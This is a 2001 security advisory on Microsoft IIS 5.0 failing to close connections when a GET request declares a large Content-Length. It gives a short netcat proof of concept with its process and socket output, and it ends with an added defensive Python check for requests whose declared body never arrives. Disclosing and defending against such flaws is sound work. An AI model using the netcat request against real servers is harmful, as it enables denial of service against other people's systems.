Microsoft IIS/5 mishandles Content-Length

Published: 2001-12-12
Updated: 2001-12-12
Severity: Medium
Threat: Remote denial of service
Error type: Failure to handle exceptional conditions
Exploitation: Server mode

Affected systems

Microsoft IIS/5

Detailed description

When an incorrect request is sent to Microsoft IIS/5.0, the server returns an error and closes the connection.

A typical, normal request looks like this:

    GET /testfile HTTP/1.1
    Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*
    Accept-Language: en-us
    Accept-Encoding: gzip, deflate
    User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
    Host: 192.168.0.10
    Connection: Keep-Alive
    Authorization: Basic

However, if we add a "Content-Length: 5300643" entry to the request, for example:

    $ cat >bogus.txt <<'EOF'
    GET /testfile HTTP/1.1
    Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*
    Accept-Language: en-us
    Accept-Encoding: gzip, deflate
    User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
    Host: 192.168.0.10
    Connection: Keep-Alive
    Content-Length: 5300643
    Authorization: Basic
    EOF
    $ nc 192.168.0.10 80 <bogus.txt &
    $ ps x
      PID  PPID  PGID  WINPID  TTY  UID  STIME     COMMAND
      696     1   696     696  con  500  12:22:37  /usr/bin/bash
     2464   696  2464    2464  con  500  12:23:56  /usr/bin/nc
     2532   696  2532    1552  con  500  12:29:16  /usr/bin/ps
    $ netstat -an |grep 192.168.0.10
    TCP 192.168.0.4:2479 192.168.0.10:80 ESTABLISHED

IIS does not close this connection. A large number of similar connections may cause a denial of service on IIS 5.0.

Test code

See the description section.

Solution

None yet.

Related information

Ivan Hernandez Puga (ivan.hernandez@globalsis.com.ar)
Reference: http://archives.neohapsis.com/archives/bugtraq/2001-12/0098.html
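
A defender-side check for the condition described above, as an added example that is not part of the original advisory: it screens a request head for a declared Content-Length on a body-less method and flags connections whose promised body never arrives. The function names, the 30-second idle threshold and the reject-on-GET policy are assumptions; the sample request is constructed from the one shown in the advisory.

```python
# Added example: screening for requests that declare a body and never send it.
BODYLESS_METHODS = {"GET", "HEAD"}   # assumed policy: no body accepted here
MAX_IDLE_SECONDS = 30                # assumed body-read timeout

# Constructed sample, shortened from the request shown in the advisory.
SAMPLE = (b"GET /testfile HTTP/1.1\r\n"
          b"Host: 192.168.0.10\r\n"
          b"Connection: Keep-Alive\r\n"
          b"Content-Length: 5300643\r\n"
          b"Authorization: Basic\r\n\r\n")


def parse_head(raw: bytes):
    """Return (method, headers) parsed from a raw HTTP request head."""
    text = raw.split(b"\r\n\r\n", 1)[0].decode("latin-1")
    lines = [l for l in text.replace("\r\n", "\n").split("\n") if l.strip()]
    if not lines:
        return "", {}
    method = lines[0].split()[0].upper()
    headers = {}
    for line in lines[1:]:
        name, sep, value = line.partition(":")
        if sep:
            headers[name.strip().lower()] = value.strip()
    return method, headers


def declared_length(headers):
    """Content-Length as int; None if absent; -1 if not plain ASCII digits."""
    value = headers.get("content-length")
    if value is None:
        return None
    return int(value) if value.isascii() and value.isdigit() else -1


def screen(raw: bytes, body_bytes_seen: int, idle_seconds: float) -> str:
    """Classify one connection as 'ok', 'reject' or 'close-stalled'."""
    method, headers = parse_head(raw)
    length = declared_length(headers)
    if length is None or length == 0:
        return "ok"
    if length < 0:
        return "reject"          # malformed Content-Length value
    if method in BODYLESS_METHODS:
        return "reject"          # body declared on a method that carries none
    if body_bytes_seen < length and idle_seconds > MAX_IDLE_SECONDS:
        return "close-stalled"   # declared body never arrived; free the slot
    return "ok"
```

In a front-end proxy the same two decisions map to rejecting the request outright and to enforcing a body-read timeout, so a held connection cannot occupy a server slot indefinitely.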